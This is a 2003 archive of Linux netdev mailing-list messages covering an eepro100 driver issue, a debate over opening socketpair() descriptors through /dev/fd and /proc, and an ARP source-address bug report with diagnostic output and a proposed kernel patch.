efnet.skynet.be, ircd server connected on EFnet with >>ircd-hybrid-6.4... > > > Any chance you can try with the e100 driver instead of eepro100? > Could I use it with these cards? Jul 22 07:55:39 fazer kernel: eepro100.c:v1.09j-t 9/29/99 Donald Becker http://www.scyld.com/netwo rk/eepro100.html Jul 22 07:55:39 fazer kernel: eepro100.c: $Revision: 1.36 $ 2000/11/17 Modified by Andrey V. Savoc hkin and others Jul 22 07:55:39 fazer kernel: eth0: Intel Corp. 82557/8/9 [Ethernet Pro 100], 00:B0:D0:B0:D0:FB, I RQ 16. Jul 22 07:55:39 fazer kernel: Receiver lock-up bug exists -- enabling work-around. Jul 22 07:55:39 fazer kernel: Board assembly 07195d-000, Physical connectors present: RJ45 Jul 22 07:55:39 fazer kernel: Primary interface chip i82555 PHY #1. Jul 22 07:55:39 fazer kernel: General self-test: passed. Jul 22 07:55:39 fazer kernel: Serial sub-system self-test: passed. Jul 22 07:55:39 fazer kernel: Internal registers self-test: passed. Jul 22 07:55:39 fazer kernel: ROM checksum self-test: passed (0x04f4518b). Jul 22 07:55:39 fazer kernel: Receiver lock-up workaround activated. Jul 22 07:55:39 fazer kernel: eth1: Intel Corp. 82557/8/9 [Ethernet Pro 100] (#2), 00:B0:D0:B0:D0: FC, IRQ 17. Jul 22 07:55:39 fazer kernel: Receiver lock-up bug exists -- enabling work-around. Jul 22 07:55:39 fazer kernel: Board assembly 07195d-000, Physical connectors present: RJ45 Jul 22 07:55:39 fazer kernel: Primary interface chip i82555 PHY #1. Jul 22 07:55:39 fazer kernel: General self-test: passed. Jul 22 07:55:39 fazer kernel: Serial sub-system self-test: passed. Jul 22 07:55:39 fazer kernel: Internal registers self-test: passed. Jul 22 07:55:39 fazer kernel: ROM checksum self-test: passed (0x04f4518b). Jul 22 07:55:39 fazer kernel: Receiver lock-up workaround activated. -- Cedric Gavage http://unixtech.be - http://gavage.com - OpenPGP: 0xED325C64 From cedric.gavage@unixtech.be Wed Jul 23 04:41:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 04:42:03 -0700 (PDT) Received: from virtual.paginaweb.be (virtual.paginaweb.be [212.3.242.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NBfrFl013214 for ; Wed, 23 Jul 2003 04:41:53 -0700 Received: from unixtech.be (warp-core.skynet.be [195.238.24.200]) (authenticated bits=0) by virtual.paginaweb.be (8.12.9/8.12.9/UnixTech - Niddle v2.5 - abuse@unixtech.be) with ESMTP id h6NBfpZk027097; Wed, 23 Jul 2003 13:41:51 +0200 Message-ID: <3F1E7435.4060308@unixtech.be> Date: Wed, 23 Jul 2003 13:40:37 +0200 From: Cedric Gavage User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030714 Debian/1.3.1-3 StumbleUpon/1.73 X-Accept-Language: en MIME-Version: 1.0 To: "David S. Miller" CC: alan@lxorguk.ukuu.org.uk, netdev@oss.sgi.com Subject: Re: [Fwd: kernel 2.4.21] References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> <3F1E53F7.5000803@unixtech.be> <20030723023528.76b0f69c.davem@redhat.com> <3F1E58EE.5010109@unixtech.be> <20030723024648.2e4b6a62.davem@redhat.com> In-Reply-To: <20030723024648.2e4b6a62.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4242 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cedric.gavage@unixtech.be Precedence: bulk X-list: netdev David S. Miller wrote: > On Wed, 23 Jul 2003 11:44:14 +0200 > Cedric Gavage wrote: > > >>David S. Miller wrote: >> >>>On Wed, 23 Jul 2003 11:23:03 +0200 >>>Cedric Gavage wrote: >>> >>>>Still this with 2.4.21 kernel: (intel internet card, driver eepro100) >>>> >>>>Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE >>>>Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) >>> >>>Are you running and old version of vsftpd? >> >>Thanks for your help... >> >>This server is efnet.skynet.be, ircd server connected on EFnet with >>ircd-hybrid-6.4... > > > Any chance you can try with the e100 driver instead of eepro100? > Ok, now it's e100 driver, I will wait some hours to see if we have again problems, thanks for your help. -- Cedric Gavage http://unixtech.be - http://gavage.com - OpenPGP: 0xED325C64 From davem@redhat.com Wed Jul 23 04:42:45 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 04:42:49 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NBgiFl013490 for ; Wed, 23 Jul 2003 04:42:45 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id EAA09784; Wed, 23 Jul 2003 04:40:27 -0700 Date: Wed, 23 Jul 2003 04:40:27 -0700 From: "David S. Miller" To: Cedric Gavage Cc: alan@lxorguk.ukuu.org.uk, netdev@oss.sgi.com Subject: Re: [Fwd: kernel 2.4.21] Message-Id: <20030723044027.152a298d.davem@redhat.com> In-Reply-To: <3F1E71C1.8080302@unixtech.be> References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> <3F1E53F7.5000803@unixtech.be> <20030723023528.76b0f69c.davem@redhat.com> <3F1E58EE.5010109@unixtech.be> <20030723024648.2e4b6a62.davem@redhat.com> <3F1E71C1.8080302@unixtech.be> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4243 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 13:30:09 +0200 Cedric Gavage wrote: > David S. Miller wrote: > > Any chance you can try with the e100 driver instead of eepro100? > Could I use it with these cards? Yes, if anything, e100 works with more cards than eepro100 does. e100 is supported well, whereas I can't remember the last time eepro100 had a change made to it :-) From davem@redhat.com Wed Jul 23 07:05:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 07:05:53 -0700 (PDT) Received: from rth.ninka.net (rth.ninka.net [216.101.162.244]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NE4VFl023426 for ; Wed, 23 Jul 2003 07:05:12 -0700 Received: from rth.ninka.net (localhost.localdomain [127.0.0.1]) by rth.ninka.net (8.12.8/8.12.8) with SMTP id h6NE4VIM018851; Wed, 23 Jul 2003 07:04:31 -0700 Date: Wed, 23 Jul 2003 07:04:31 -0700 From: "David S. Miller" To: David Korn Cc: linux-kernel@vger.kernel.org, gsf@research.att.com, netdev@oss.sgi.com Subject: Re: kernel bug in socketpair() Message-Id: <20030723070431.13859c09.davem@redhat.com> In-Reply-To: <200307231332.JAA26197@raptor.research.att.com> References: <200307231332.JAA26197@raptor.research.att.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4244 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 09:32:09 -0400 (EDT) David Korn wrote: [ Added netdev@oss.sgi.com, the proper place to discuss networking kernel issues. ] > The first problem is that files created with socketpair() are not accessible > via /dev/fd/n or /proc/$$/fd/n where n is the file descriptor returned > by socketpair(). Note that this is not a problem with pipe(). Not a bug. Sockets are not openable via /proc files under any circumstances, not just the circumstances you describe. This is a policy decision and prevents a whole slew of potential security holes. From dgk@research.att.com Wed Jul 23 07:29:09 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 07:29:42 -0700 (PDT) Received: from linux.research.att.com (H-135-207-24-16.research.att.com [135.207.24.16]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NESSFl024955 for ; Wed, 23 Jul 2003 07:29:09 -0700 Received: from raptor.research.att.com (raptor.research.att.com [135.207.23.32]) by linux.research.att.com (8.12.8/8.12.8) with ESMTP id h6NEjTJh026849; Wed, 23 Jul 2003 10:45:29 -0400 Received: (from dgk@localhost) by raptor.research.att.com (SGI-8.9.3p2/8.8.7) id KAA15254; Wed, 23 Jul 2003 10:28:22 -0400 (EDT) Date: Wed, 23 Jul 2003 10:28:22 -0400 (EDT) From: David Korn Message-Id: <200307231428.KAA15254@raptor.research.att.com> X-Mailer: mailx (AT&T/BSD) 9.9 2003-01-17 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: davem@redhat.com Subject: Re: Re: kernel bug in socketpair() Cc: gsf@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com X-archive-position: 4245 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: dgk@research.att.com Precedence: bulk X-list: netdev > On Wed, 23 Jul 2003 09:32:09 -0400 (EDT) > David Korn wrote: > > [ Added netdev@oss.sgi.com, the proper place to discuss networking kernel issues > . ] > > > The first problem is that files created with socketpair() are not accessible > > via /dev/fd/n or /proc/$$/fd/n where n is the file descriptor returned > > by socketpair(). Note that this is not a problem with pipe(). > > Not a bug. > > Sockets are not openable via /proc files under any circumstances, > not just the circumstances you describe. This is a policy decision and > prevents a whole slew of potential security holes. > > Thanks for you quick response. This make sense for INET sockets, but I don't understand the security considerations for UNIX domain sockets. Could you please elaborate? Moreover, /dev/fd/n, (as opposed to /proc/$$/n) is restricted to the current process and its decendents if close-on-exec is not specified. Again, I don't understand why this would create a security problem either since the socket is already accesible via the original descriptor. Finally if this is a security problem, why is the errno is set to ENXIO rather than EACCESS? David Korn dgk@research.att.com From davem@redhat.com Wed Jul 23 07:48:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 07:49:31 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NEmWFl026345 for ; Wed, 23 Jul 2003 07:48:55 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id HAA10323; Wed, 23 Jul 2003 07:46:15 -0700 Date: Wed, 23 Jul 2003 07:46:15 -0700 From: "David S. Miller" To: David Korn Cc: gsf@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: kernel bug in socketpair() Message-Id: <20030723074615.25eea776.davem@redhat.com> In-Reply-To: <200307231428.KAA15254@raptor.research.att.com> References: <200307231428.KAA15254@raptor.research.att.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4246 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 10:28:22 -0400 (EDT) David Korn wrote: > This make sense for INET sockets, but I don't understand the security > considerations for UNIX domain sockets. Could you please elaborate? > Moreover, /dev/fd/n, (as opposed to /proc/$$/n) is restricted to > the current process and its decendents if close-on-exec is not specified. > Again, I don't understand why this would create a security problem > either since the socket is already accesible via the original > descriptor. Someone else would have to comment, but I do know we've had this behavior since day one. And therefore I wouldn't be doing many people much of a favor by changing the behavior today, what will people do who need their things to work on the bazillion existing linux kernels running out there? :-) Also, see below for another reason why this behavior is unlikely to change. > Finally if this is a security problem, why is the errno is set to ENXIO > rather than EACCESS? Look at the /proc file we put there for socket FD's. It's a symbolic link with a readable string of the form ("socket:[%d]", inode_nr) So your program ends up doing a follow of a symbolic link with that string name, which does not exist. Thinking more about this, changing this behavior would probably break more programs than it would help begin to function, so this is unlikely to ever change. From carlosev@newipnet.com Wed Jul 23 08:20:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 08:20:28 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NFJXFl029122 for ; Wed, 23 Jul 2003 08:20:15 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id D9EF920776; Wed, 23 Jul 2003 17:19:31 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id C71FC207AB for ; Wed, 23 Jul 2003 17:19:17 +0200 (CEST) Message-ID: <200307231712000985.1CE20A63@192.168.128.16> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Wed, 23 Jul 2003 17:12:00 +0200 From: "Carlos Velasco" To: netdev@oss.sgi.com Subject: Bug? ARP with wrong src IP address Mime-Version: 1.0 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6NFJXFl029122 X-archive-position: 4247 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev Hi, Problem Description: 1 ethernet interface IP (eth0): 192.168.128.16 netmask 255.255.255.0 1 loopback address IP (lo:2): 1.1.1.1 netmask 255.255.255.255 1 route to 2.2.2.2 through 192.168.128.60 A packet is sent from machine with IP 2.2.2.2 to the linux machine to dst IP 1.1.1.1 (lo:2) through ethernet interface (eth0). When linux machine tries to find out the mac address of 192.168.128.60 with ARP, it uses the loopback IP address (lo:2) as source insted of the IP address of the ethernet interface (eth0). tcpdump output: > tcpdump -nei eth0 arp or host 2.2.2.2 tcpdump: listening on eth0 00:29:38.385849 0:c:85:1f:a3:d6 0:48:54:6a:3a:dd 0800 64: 2.2.2.2.55302 > 1.1.1.1.23: S 4186612861:4186612861(0) win 4128 (DF) [tos 0xc0] 00:29:38.386200 0:48:54:6a:3a:dd ff:ff:ff:ff:ff:ff 0806 42: arp who-has 192.168.128.60 tell 1.1.1.1 00:29:39.385310 0:48:54:6a:3a:dd ff:ff:ff:ff:ff:ff 0806 42: arp who-has 192.168.128.60 tell 1.1.1.1 ifconfig output: > ifconfig -a eth0 Link encap:Ethernet HWaddr 00:48:54:6A:3A:DD inet addr:192.168.128.16 Bcast:192.168.128.255 Mask:255.255.255.0 inet6 addr: fe80::248:54ff:fe6a:3add/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2695 errors:0 dropped:0 overruns:0 frame:0 TX packets:2829 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:308510 (301.2 Kb) TX bytes:353754 (345.4 Kb) Interrupt:15 Base address:0xe000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:379 errors:0 dropped:0 overruns:0 frame:0 TX packets:379 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:136862 (133.6 Kb) TX bytes:136862 (133.6 Kb) lo:2 Link encap:Local Loopback inet addr:1.1.1.1 Mask:255.255.255.255 UP LOOPBACK RUNNING MTU:16436 Metric:1 route print: > ip route list 2.2.2.2 via 192.168.128.60 dev eth0 192.168.128.0/24 dev eth0 proto kernel scope link src 192.168.128.16 default via 192.168.128.200 dev eth0 mtu 300 arp table: > arp -a ? (192.168.128.202) at 00:30:B6:01:17:80 [ether] on eth0 router.newipnet.com (192.168.128.200) at 00:0C:85:1F:A3:D6 [ether] on eth0 ? (192.168.128.60) at on eth0 madre.newipnet.com (192.168.128.4) at 00:E0:7D:7B:D3:8E [ether] on eth0 Steps to reproduce: 1. Setup Loopback interface 2. clear arp table 3. setup a route in another PC to reach the loopback address through IP in ethernet interface in linux box. 4. use ping from another PC to the loopback ip address. 5. You can see the ARP requests with wrong ip source address in linux box with tcpdump or ethereal. Possible Patch (I have tried it and works, but not know if it's 100% accurate): --- linux-2.6.0-test1/net/ipv4/arp.c Mon Jul 14 05:37:28 2003 +++ linux-2.6.0-test1-patch/net/ipv4/arp.c Wed Jul 23 15:31:29 2003 @@ -326,10 +326,14 @@ u32 target = *(u32*)neigh->primary_key; int probes = atomic_read(&neigh->probes); + /* This don't work if the src addr is a loopback or similar. + See http://bugzilla.kernel.org/show_bug.cgi?id=978 + if (skb && inet_addr_type(skb->nh.iph->saddr) == RTN_LOCAL) saddr = skb->nh.iph->saddr; - else - saddr = inet_select_addr(dev, target, RT_SCOPE_LINK); + else */ + + saddr = inet_select_addr(dev, target, RT_SCOPE_LINK); if ((probes -= neigh->parms->ucast_probes) < 0) { if (!(neigh->nud_state&NUD_VALID)) Bug is reported in bugzilla: http://bugzilla.kernel.org/show_bug.cgi?id=978 Regards, Carlos Velasco From carlosev@newipnet.com Wed Jul 23 08:33:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 08:33:20 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NFXCFl030203 for ; Wed, 23 Jul 2003 08:33:14 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 4C688207AB; Wed, 23 Jul 2003 17:33:11 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id B9B5C20776 for ; Wed, 23 Jul 2003 17:32:57 +0200 (CEST) Message-ID: <200307231725400974.1CEE8D78@192.168.128.16> References: <200307231712000985.1CE20A63@192.168.128.16> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Wed, 23 Jul 2003 17:25:40 +0200 From: "Carlos Velasco" To: netdev@oss.sgi.com Subject: Bug? ARP with wrong src IP address Mime-Version: 1.0 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6NFXCFl030203 X-archive-position: 4248 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev Hi, Problem Description: 1 ethernet interface IP (eth0): 192.168.128.16 netmask 255.255.255.0 1 loopback address IP (lo:2): 1.1.1.1 netmask 255.255.255.255 1 route to 2.2.2.2 through 192.168.128.60 A packet is sent from machine with IP 2.2.2.2 to the linux machine to dst IP 1.1.1.1 (lo:2) through ethernet interface (eth0). When linux machine tries to find out the mac address of 192.168.128.60 with ARP, it uses the loopback IP address (lo:2) as source insted of the IP address of the ethernet interface (eth0). tcpdump output: > tcpdump -nei eth0 arp or host 2.2.2.2 tcpdump: listening on eth0 00:29:38.385849 0:c:85:1f:a3:d6 0:48:54:6a:3a:dd 0800 64: 2.2.2.2.55302 > 1.1.1.1.23: S 4186612861:4186612861(0) win 4128 (DF) [tos 0xc0] 00:29:38.386200 0:48:54:6a:3a:dd ff:ff:ff:ff:ff:ff 0806 42: arp who-has 192.168.128.60 tell 1.1.1.1 00:29:39.385310 0:48:54:6a:3a:dd ff:ff:ff:ff:ff:ff 0806 42: arp who-has 192.168.128.60 tell 1.1.1.1 ifconfig output: > ifconfig -a eth0 Link encap:Ethernet HWaddr 00:48:54:6A:3A:DD inet addr:192.168.128.16 Bcast:192.168.128.255 Mask:255.255.255.0 inet6 addr: fe80::248:54ff:fe6a:3add/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2695 errors:0 dropped:0 overruns:0 frame:0 TX packets:2829 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:308510 (301.2 Kb) TX bytes:353754 (345.4 Kb) Interrupt:15 Base address:0xe000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:379 errors:0 dropped:0 overruns:0 frame:0 TX packets:379 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:136862 (133.6 Kb) TX bytes:136862 (133.6 Kb) lo:2 Link encap:Local Loopback inet addr:1.1.1.1 Mask:255.255.255.255 UP LOOPBACK RUNNING MTU:16436 Metric:1 route print: > ip route list 2.2.2.2 via 192.168.128.60 dev eth0 192.168.128.0/24 dev eth0 proto kernel scope link src 192.168.128.16 default via 192.168.128.200 dev eth0 mtu 300 arp table: > arp -a ? (192.168.128.202) at 00:30:B6:01:17:80 [ether] on eth0 router.newipnet.com (192.168.128.200) at 00:0C:85:1F:A3:D6 [ether] on eth0 ? (192.168.128.60) at on eth0 madre.newipnet.com (192.168.128.4) at 00:E0:7D:7B:D3:8E [ether] on eth0 Steps to reproduce: 1. Setup Loopback interface 2. clear arp table 3. setup a route in another PC to reach the loopback address through IP in ethernet interface in linux box. 4. use ping from another PC to the loopback ip address. 5. You can see the ARP requests with wrong ip source address in linux box with tcpdump or ethereal. Possible Patch (I have tried it and works, but not know if it's 100% accurate): --- linux-2.6.0-test1/net/ipv4/arp.c Mon Jul 14 05:37:28 2003 +++ linux-2.6.0-test1-patch/net/ipv4/arp.c Wed Jul 23 15:31:29 2003 @@ -326,10 +326,14 @@ u32 target = *(u32*)neigh->primary_key; int probes = atomic_read(&neigh->probes); + /* This don't work if the src addr is a loopback or similar. + See http://bugzilla.kernel.org/show_bug.cgi?id=978 + if (skb && inet_addr_type(skb->nh.iph->saddr) == RTN_LOCAL) saddr = skb->nh.iph->saddr; - else - saddr = inet_select_addr(dev, target, RT_SCOPE_LINK); + else */ + + saddr = inet_select_addr(dev, target, RT_SCOPE_LINK); if ((probes -= neigh->parms->ucast_probes) < 0) { if (!(neigh->nud_state&NUD_VALID)) Bug is reported in bugzilla: http://bugzilla.kernel.org/show_bug.cgi?id=978 Regards, Carlos Velasco From davem@redhat.com Wed Jul 23 08:36:24 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 08:36:29 -0700 (PDT) Received: from rth.ninka.net (rth.ninka.net [216.101.162.244]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NFaNFl030697 for ; Wed, 23 Jul 2003 08:36:24 -0700 Received: from rth.ninka.net (localhost.localdomain [127.0.0.1]) by rth.ninka.net (8.12.8/8.12.8) with SMTP id h6NFaLIM019053; Wed, 23 Jul 2003 08:36:21 -0700 Date: Wed, 23 Jul 2003 08:36:21 -0700 From: "David S. Miller" To: Alan Cox Cc: dgk@research.att.com, linux-kernel@vger.kernel.org, gsf@research.att.com, netdev@oss.sgi.com Subject: Re: kernel bug in socketpair() Message-Id: <20030723083621.26429e51.davem@redhat.com> In-Reply-To: <1058970007.5520.68.camel@dhcp22.swansea.linux.org.uk> References: <200307231332.JAA26197@raptor.research.att.com> <1058970007.5520.68.camel@dhcp22.swansea.linux.org.uk> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4249 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On 23 Jul 2003 15:20:08 +0100 Alan Cox wrote: > On Mer, 2003-07-23 at 14:32, David Korn wrote: > > The first problem is that files created with socketpair() are not accessible > > via /dev/fd/n or /proc/$$/fd/n where n is the file descriptor returned > > by socketpair(). Note that this is not a problem with pipe(). > > This is intentional - sockets do not have an "open" operation currently. Sure, but we've known this for a long time. And because we knew, we decided not to add an "open" method to sockets. The reason, as I remember it, was security. Was it not? From alan@lxorguk.ukuu.org.uk Wed Jul 23 09:19:28 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 09:19:37 -0700 (PDT) Received: from lxorguk.ukuu.org.uk (crosslink-village-512-1.bc.nu [81.2.110.254] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NGJQFl001735 for ; Wed, 23 Jul 2003 09:19:27 -0700 Received: from dhcp22.swansea.linux.org.uk (dhcp22.swansea.linux.org.uk [127.0.0.1]) by lxorguk.ukuu.org.uk (8.12.8/8.12.5) with ESMTP id h6NGEVI5006358; Wed, 23 Jul 2003 17:14:51 +0100 Received: (from alan@localhost) by dhcp22.swansea.linux.org.uk (8.12.8/8.12.8/Submit) id h6NGDeG6006356; Wed, 23 Jul 2003 17:13:40 +0100 X-Authentication-Warning: dhcp22.swansea.linux.org.uk: alan set sender to alan@lxorguk.ukuu.org.uk using -f Subject: Re: kernel bug in socketpair() From: Alan Cox To: "David S. Miller" Cc: dgk@research.att.com, Linux Kernel Mailing List , gsf@research.att.com, netdev@oss.sgi.com In-Reply-To: <20030723083621.26429e51.davem@redhat.com> References: <200307231332.JAA26197@raptor.research.att.com> <1058970007.5520.68.camel@dhcp22.swansea.linux.org.uk> <20030723083621.26429e51.davem@redhat.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit Organization: Message-Id: <1058976818.5520.91.camel@dhcp22.swansea.linux.org.uk> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.2 (1.2.2-5) Date: 23 Jul 2003 17:13:40 +0100 X-archive-position: 4250 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: alan@lxorguk.ukuu.org.uk Precedence: bulk X-list: netdev On Mer, 2003-07-23 at 16:36, David S. Miller wrote: > > This is intentional - sockets do not have an "open" operation currently. > > Sure, but we've known this for a long time. > > And because we knew, we decided not to add an "open" > method to sockets. The reason, as I remember it, was > security. > > Was it not? Mostly if I remember rightly that if you don't do the check because you have no open operation to create a new instance you crash the box. HPA did have some sensible ideas about how to do "open" on AF_UNIX sockets but for the others its really unclear quite what "open" means From gsf@research.att.com Wed Jul 23 09:56:19 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 09:56:24 -0700 (PDT) Received: from linux.research.att.com (H-135-207-24-16.research.att.com [135.207.24.16]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NGuIFl004226 for ; Wed, 23 Jul 2003 09:56:19 -0700 Received: from raptor.research.att.com (raptor.research.att.com [135.207.23.32]) by linux.research.att.com (8.12.8/8.12.8) with ESMTP id h6NHDLJh027976; Wed, 23 Jul 2003 13:13:21 -0400 Received: (from gsf@localhost) by raptor.research.att.com (SGI-8.9.3p2/8.8.7) id MAA69129; Wed, 23 Jul 2003 12:56:12 -0400 (EDT) Date: Wed, 23 Jul 2003 12:56:12 -0400 (EDT) From: Glenn Fowler Message-Id: <200307231656.MAA69129@raptor.research.att.com> Organization: AT&T Labs Research X-Mailer: mailx (AT&T/BSD) 9.9 2003-01-17 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> To: davem@redhat.com, dgk@research.att.com Subject: Re: kernel bug in socketpair() Cc: linux-kernel@vger.kernel.org, netdev@oss.sgi.com X-archive-position: 4251 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: gsf@research.att.com Precedence: bulk X-list: netdev you can eliminate the security implications for all fd types by simply translating open("/dev/fd/N",...) to dup(atoi(N)) w.r.t. fd N in the current process the problem is that linux took an implementation shortcut by symlinking /dev/fd/N -> /proc/self/fd/N and by the time the kernel sees /proc/self/fd/N the "self"-ness is apparently lost, and it is forced to do the security checks if the /proc fd open code has access to the original /proc/PID/fd/N path then it can do dup(atoi(N)) when the PID is the current process without affecting security otherwise there is a bug in the /dev/fd/N -> /proc/self/fd/N implementation and /dev/fd/N should be separated out to its (original) dup(atoi(N)) semantics see http://mail-index.netbsd.org/current-users/1994/03/29/0027.html for an early (bsd) discussion of /dev/fd/N vs. /proc/self/fd/N -- Glenn Fowler AT&T Labs Research, Florham Park NJ -- On Wed, 23 Jul 2003 07:46:15 -0700 David S. Miller wrote: > On Wed, 23 Jul 2003 10:28:22 -0400 (EDT) > David Korn wrote: > > This make sense for INET sockets, but I don't understand the security > > considerations for UNIX domain sockets. Could you please elaborate? > > Moreover, /dev/fd/n, (as opposed to /proc/$$/n) is restricted to > > the current process and its decendents if close-on-exec is not specified. > > Again, I don't understand why this would create a security problem > > either since the socket is already accesible via the original > > descriptor. > Someone else would have to comment, but I do know we've had > this behavior since day one. > And therefore I wouldn't be doing many people much of a favor > by changing the behavior today, what will people do who need > their things to work on the bazillion existing linux kernels > running out there? :-) > Also, see below for another reason why this behavior is unlikely > to change. > > Finally if this is a security problem, why is the errno is set to ENXIO > > rather than EACCESS? > Look at the /proc file we put there for socket FD's. It's a symbolic > link with a readable string of the form ("socket:[%d]", inode_nr) > So your program ends up doing a follow of a symbolic link with that > string name, which does not exist. > 